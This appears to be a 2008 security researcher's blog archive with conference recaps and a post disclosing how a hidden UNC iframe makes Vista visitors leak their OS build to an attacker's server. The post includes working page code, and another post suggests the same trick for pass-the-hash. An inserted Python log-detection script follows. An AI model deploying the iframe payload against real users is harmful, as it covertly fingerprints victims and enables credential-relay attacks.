Thursday, May 22, 2008

[ Miscellaneous Security Musings ]

There's not going to be anything too technical or groundbreaking in this post. I'm waiting on a flaw to get fixed by Google right now so I figured I'd post this in the interim.


I've been in the security industry for all of 11 months now and I believe I have a fair amount of knowledge (at least in the web app security arena). As I learned more I began to realize that security is almost cyclical in nature. When defenders (i.e. software companies, network admins) concentrate on one area, attackers will move to another area. After several iterations of switching focus to a different area, the originally vulnerable area will lose focus entirely. Attackers will switch back after finding some new class of vulnerability and the cycle will go on.

This whole train of thought was brought about by a couple things. I've been fortunate enough to be included in research that some really smart people are doing and this theme has popped up recently. Unfortunately I really can't talk about this ongoing research (especially since none of it is mine anyway).

But also, something a colleague of mine said the other day reinforced this. After I discovered that you can put a UNC notation address into an iframe source, he had the idea of forcing the user's Windows computer to connect to a computer of the attacker's choice (think passing the hash). He then turned to me and said "what was old is new again".


I'm not sure where I'm going with this, but it seems to me, this is how it works. Some area of security loses focus, people get sloppy, next thing you know we're seeing vulnerabilities again.

How do you combat this? It's human nature to get complacent. Maybe after a few more years of experience I'll have some creative suggestions for this problem. But for now, I'll just concentrate on the pwnage.


Monday, May 12, 2008

[ We're In @ Black Hat Vegas ]

Holy crap! I can't believe we actually got in!


The first computer security conference I ever attended was Black Hat Vegas last year and now I'm going to be speaking there with Nate McFeters, Billy Rios and John Heasman. Crazy. I've spoken now at Black Hat Japan, Federal and Europe, but Vegas is The Big Show. Thanks to everybody who voted for us.

Our talk is entitled "The Internet Is Broken: Beyond document.cookie - Extreme Client Side Exploitation". We're going to show some pretty sick stuff there and it's going to be a two-session deal. Prepare yourself for a brain-meltingly awesome talk.



See you in Vegas!


Thursday, May 08, 2008

[ Blue Hat Day 2 ]

I think I'm sufficiently recovered to blog about day 2.


I'm just kidding, it wasn't that bad, but I did drink a ton of vodka that night at the IOActive-sponsored limo races, and the Jello shots at the end didn't help at all either.

But let's rewind a bit and reminisce about the talks. Billy and Nitesh started off the conference in style with their Bad Sushi talk. Even though I've seen this talk 3 times I still enjoy it immensely.

Then kuza55 (Alex K.) talked about The Browser and Other Mistakes. It's been said before by others that his grasp of web app security is amazing for his age and I agree, but he's also a pretty cool guy to hang out with as well. He had some great stuff in his talk and some of the things he mentioned gave me ideas for future research.

Another talk I really enjoyed was Manuel Caballero's talk about resident scripts. That talk was sick. I couldn't believe some of the stuff I was seeing. That will definitely be a focus in some of my future research into other languages.

Also, I got to meet Peleus Uhley and Eric Lee of the Adobe product security team. We worked pretty closely with them to get our Flash DNS Rebinding issue fixed.

When all was said and done I really had a great time there and I can't believe I was actually invited to attend. Thanks again to Katie Moussouris for inviting Nate and me out to the Microsoft campus. And kudos to the MSRC for all their efforts in the security space. It really looks like things are heading in the right direction. Unfortunately that makes my job more difficult...

I'll leave you with a picture from the inside of team Stoners/Hippies limo before our booze was stolen by certain unnamed assailants:


By the way, Nate has a pretty good writeup about Blue Hat over on the ZDNet Zero Day blog. Check it out.


Monday, May 05, 2008

[ Vista OS Version Trick ]

I found out about this nifty little trick while messing around with UNC notation in the browser. For those wondering, I'll blog about the second day of Blue Hat some other time. Still mentally recovering from the limo races ;)


So, to start this out, I discovered something interesting about UNC notation. You can specify a port number. For example, if I did this in the browser:

\\1.2.3.4:80

It will actually try to connect to port 80, but it does some strange stuff when it tries that. Since Vista doesn't know exactly WHAT service is running on port 80 it will send a couple interesting requests to it. First it sends an OPTIONS HTTP request to that port. Then if it gets an intelligible response it will send some PROPFIND requests. Weird. Here are a couple examples of what it looks like from my Apache server logs:

8.7.6.5 - - [30/Apr/2008:16:35:23 -0500] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/6.0.6000"

5.4.3.2 - - [29/Apr/2008:16:21:38 -0500] "PROPFIND / HTTP/1.0" 200 - "-" "Microsoft-WebDAV-MiniRedir/6.0.6001"

And here is an actual HTTP request:

PROPFIND / HTTP/1.1
Content-Length: 0
Depth: 0
translate: f
User-Agent: Microsoft-WebDAV-MiniRedir/6.0.6000
Host: 1.2.3.4
Proxy-Connection: Keep-Alive

The thing we want to focus on here is the User-Agent header. It invariably says "Microsoft-WebDAV-MiniRedir/" but the version number included after the slash differs depending on what version of Vista the user is running.


Version 6.0.6000 is Vista Ultimate with no service pack and 6.0.6001 is Vista Ultimate with SP1 installed. I haven't had a chance to test other versions. So if we have a page like this:

<html>
<head>
<script>
// Insert the iframe after a short delay so the rest of the page has rendered.
// The "\\\\" in the JavaScript string literal becomes "\\" in the resulting
// HTML, i.e. the UNC path \\1.2.3.4:80.
function f() {
document.getElementById("shady").innerHTML = "<iframe name='s' id='s' src='\\\\1.2.3.4:80' width='40%' height='300'></iframe>";
}
setTimeout('f()', 500);
</script>
</head>
<body>
Nothing shady going on here....<br><br>
<div id="shady"></div>
</body>
</html>

We can force visitors to give up their Vista version number just by having them visit our page.


Obviously we can make the iframe invisible so the error message doesn't show up for the victim.

So this, in and of itself, is not a system compromising attack, but the more information we can glean from the target the more ammunition we have as attackers. By the way, this does not work in XP.
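From the server-side point of view, the same User-Agent header that leaks the version is also what makes these probes easy to spot in web logs. The following is an added example (not code from the original post) that parses Apache combined-format lines like the ones above, picks out Microsoft-WebDAV-MiniRedir requests, and maps the version suffix to the two Vista builds the post identifies; the log lines it uses are constructed to match the post's examples, and the one non-MiniRedir line is constructed as well.

```python
import re

# Apache combined log format, as used in the post's examples.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# User-Agent sent by the Vista WebDAV mini-redirector.
MINIREDIR_RE = re.compile(r'^Microsoft-WebDAV-MiniRedir/(?P<version>[\d.]+)$')

# Version-to-build mapping stated in the post; anything else is "unknown".
KNOWN_VERSIONS = {
    "6.0.6000": "Windows Vista (no service pack)",
    "6.0.6001": "Windows Vista SP1",
}

def parse_line(line):
    """Return the fields of one combined-format log line, or None if it doesn't match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def miniredir_version(user_agent):
    """Return the version suffix of a MiniRedir User-Agent, or None for other agents."""
    m = MINIREDIR_RE.match(user_agent)
    return m.group("version") if m else None

def find_miniredir_probes(lines):
    """Group MiniRedir requests by client IP.

    Returns {ip: {"version": str, "os": str, "methods": [str, ...]}} so a
    defender can see which clients were coaxed into the OPTIONS/PROPFIND
    sequence and what build they revealed.
    """
    probes = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        version = miniredir_version(rec["ua"])
        if version is None:
            continue  # ordinary browser traffic, not a WebDAV probe
        entry = probes.setdefault(rec["ip"], {
            "version": version,
            "os": KNOWN_VERSIONS.get(version, "unknown"),
            "methods": [],
        })
        entry["methods"].append(rec["method"])
    return probes

# Constructed sample log: the post's two MiniRedir lines, a PROPFIND from the
# first client, and one regular browser request that must be ignored.
SAMPLE_LOG = [
    '8.7.6.5 - - [30/Apr/2008:16:35:23 -0500] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/6.0.6000"',
    '8.7.6.5 - - [30/Apr/2008:16:35:23 -0500] "PROPFIND / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/6.0.6000"',
    '5.4.3.2 - - [29/Apr/2008:16:21:38 -0500] "PROPFIND / HTTP/1.0" 200 - "-" "Microsoft-WebDAV-MiniRedir/6.0.6001"',
    '9.9.9.9 - - [29/Apr/2008:16:22:01 -0500] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (constructed)"',
]

if __name__ == "__main__":
    for ip, info in find_miniredir_probes(SAMPLE_LOG).items():
        print(ip, info["version"], info["os"], ",".join(info["methods"]))
```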


Friday, May 02, 2008

[ Blue Hat Day 1 ]

I'm not going to say much in this post because I'm really tired right now. Mostly because I traveled today and it's 3:30 am in my time zone. But I'm back in Seattle again (last time was about two weeks ago) and this time it's for Microsoft's Blue Hat conference.


Microsoft held a welcoming party for everybody at the See Sound Lounge in downtown fairly close to the waterfront. Pretty cool place, live DJ, good finger foods and free alcohol. I got to hang out with Nate, Billy, John, Kev, Nitesh, h1kar1, kuza55, fukami, Peleus Uhley and Dan "Sombrero" Kaminsky. I think I see some of these guys more than I see my girlfriend these days.

But anyway, seems like they have a great line up of speakers and topics here and I'm really honored that I was invited to attend. Let the talks begin!
